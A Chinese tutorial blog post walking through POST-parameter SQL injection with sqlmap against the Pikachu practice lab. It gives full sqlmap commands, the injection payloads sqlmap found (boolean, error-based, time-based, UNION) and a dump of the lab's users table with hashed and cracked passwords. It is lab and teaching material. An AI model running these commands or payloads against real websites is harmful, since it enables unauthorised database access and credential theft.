Sqlmap -- POST注入

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
云数据库 RDS MySQL,高可用系列 2核4GB
简介: Sqlmap -- POST注入

一、检测是否存在注入

1、通过BurpSuite抓包获取提交的数据

0a2653c851af460fa595bd959398a8f1.png

2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2"

--data指定提交的数据

0eacb84100b54626af849e6b562bf92a.png

运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入

[14:37:09] [INFO] POST parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable

POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:

---

Parameter: id (POST)

   Type: boolean-based blind

   Title: AND boolean-based blind - WHERE or HAVING clause

   Payload: id=1 AND 9442=9442&submit=%E6%9F%A5%E8%AF%A2

   Type: error-based

   Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)

   Payload: id=1 AND GTID_SUBSET(CONCAT(0x717a717871,(SELECT (ELT(4194=4194,1))),0x7170717671),4194)&submit=%E6%9F%A5%E8%AF%A2

   Type: time-based blind

   Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

   Payload: id=1 AND (SELECT 2494 FROM (SELECT(SLEEP(5)))BUUY)&submit=%E6%9F%A5%E8%AF%A2

   Type: UNION query

   Title: Generic UNION query (NULL) - 2 columns

   Payload: id=1 UNION ALL SELECT CONCAT(0x717a717871,0x59534b7664464e646f414f4e546e6c72455448476447636f50574a75434971514a486f6d724a664e,0x7170717671),NULL-- -&submit=%E6%9F%A5%E8%AF%A2

---

[14:37:16] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11, PHP

back-end DBMS: MySQL >= 5.6

[14:37:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

二、获取数据库名称

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --dbs

转存失败重新上传取消转存失败重新上传取消转存失败重新上传取消

运行结果:

[14:42:01] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.15.11, PHP, PHP 5.4.45

back-end DBMS: MySQL >= 5.6

[14:42:01] [INFO] fetching database names

available databases [10]:

[*] challenges

[*] dvwa

[*] information_schema

[*] mysql

[*] performance_schema

[*] pikachu

[*] security

[*] sys

[*] www_dgdg_com

[*] www_zm_com

[14:42:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'  

三、获取表名

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables

2d65d23f6d4748949b924e4057485923.png

运行结果:

14:44:08] [INFO] the back-end DBMS is MySQL

web application technology: PHP, PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[14:44:08] [INFO] fetching tables for database: 'pikachu'

Database: pikachu

[5 tables]

+----------+

| member   |

| httpinfo |

| message  |

| users    |

| xssblind |

+----------+

[14:44:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

四、获取字段名

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns

2e9b90b2ca334476abebe75bafe6eeaa.png

运行结果:

[14:51:18] [INFO] the back-end DBMS is MySQL

web application technology: PHP, PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[14:51:18] [INFO] fetching columns for table 'users' in database 'pikachu'

Database: pikachu

Table: users

[4 columns]

+----------+------------------+

| Column   | Type             |

+----------+------------------+

| level    | int(11)          |

| id       | int(10) unsigned |

| password | varchar(66)      |

| username | varchar(30)      |

+----------+------------------+

[14:51:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

五、获取字段内容

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --dump "username,password

4cebaac233b3433da32a72337a77fc60.png

运行结果:

Database: pikachu                                                                        

Table: users

[3 entries]

+----+---------+-------------------------------------------+----------+

| id | level   | password                                  | username |

+----+---------+-------------------------------------------+----------+

| 1  | 1       | e10adc3949ba59abbe56e057f20f883e (123456) | admin    |

| 2  | 2       | 670b14728ad9902aecba32e22fa4f6bd (000000) | pikachu  |

| 3  | 3       | e99a18c428cb38d5f260853678922e03 (abc123) | test     |

+----+---------+-------------------------------------------+----------+

[14:56:08] [INFO] table 'pikachu.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.139.129/dump/pikachu/users.csv'                                                

[14:56:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

六、其他检测POST注入方法

1、BurpSuite抓包,将数据包内容保存到1.txt

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1

Host: 192.168.139.129

Content-Length: 30

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.139.129

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.139.129/pikachu/vul/sqli/sqli_id.php

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=6t4bb3nb4rarqod4j073m038h4

Connection: close

id=1&submit=%E6%9F%A5%E8%AF%A2

2、获取数据库名称

sqlmap -r /home/aiyou/桌面/1.txt --dbs

-r:指定数据包的绝对路径

3、获取表名

sqlmap -r /home/aiyou/桌面/1.txt -D pikachu --tables

4、获取字段名

sqlmap -r /home/aiyou/桌面/1.txt -D pikachu -T users --columns

5、获取字段内容

sqlmap -r /home/aiyou/桌面/1.txt -D pikachu -T users --dump "username,password"

禁止非法,后果自负

相关实践学习
如何快速连接云数据库RDS MySQL
本场景介绍如何通过阿里云数据管理服务DMS快速连接云数据库RDS MySQL,然后进行数据表的CRUD操作。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
7月前
|
安全 关系型数据库 MySQL
Sqlmap2021 -- Cookie注入
Sqlmap2021 -- Cookie注入
381 1
|
7月前
|
SQL 安全 关系型数据库
Sqlmap2021 -- Referer注入
Sqlmap2021 -- Referer注入
151 1
|
7月前
|
Go
12、报错注入(Post)
12、报错注入(Post)
37 0
|
7月前
|
SQL
注入工具 -- sqlmap(自定义检测参数)
注入工具 -- sqlmap(自定义检测参数)
83 0
|
7月前
|
SQL 安全 PHP
CTF--Web安全--SQL注入之Post-Union注入
CTF--Web安全--SQL注入之Post-Union注入
|
7月前
|
数据库
Sqlmap是如何GET注入的
Sqlmap是如何GET注入的
58 0
|
7月前
|
SQL 关系型数据库 MySQL
注入工具 -- sqlmap(注入参数)
注入工具 -- sqlmap(注入参数)
118 0
|
7月前
|
Web App开发 数据安全/隐私保护 iOS开发
注入工具 -- sqlmap(设置请求参数)
注入工具 -- sqlmap(设置请求参数)
87 0
|
7月前
|
SQL
​注入工具 -- sqlmap(获取目标)
​注入工具 -- sqlmap(获取目标)
64 0
|
7月前
|
Go
小课堂 -- 报错注入(post)
小课堂 -- 报错注入(post)
27 0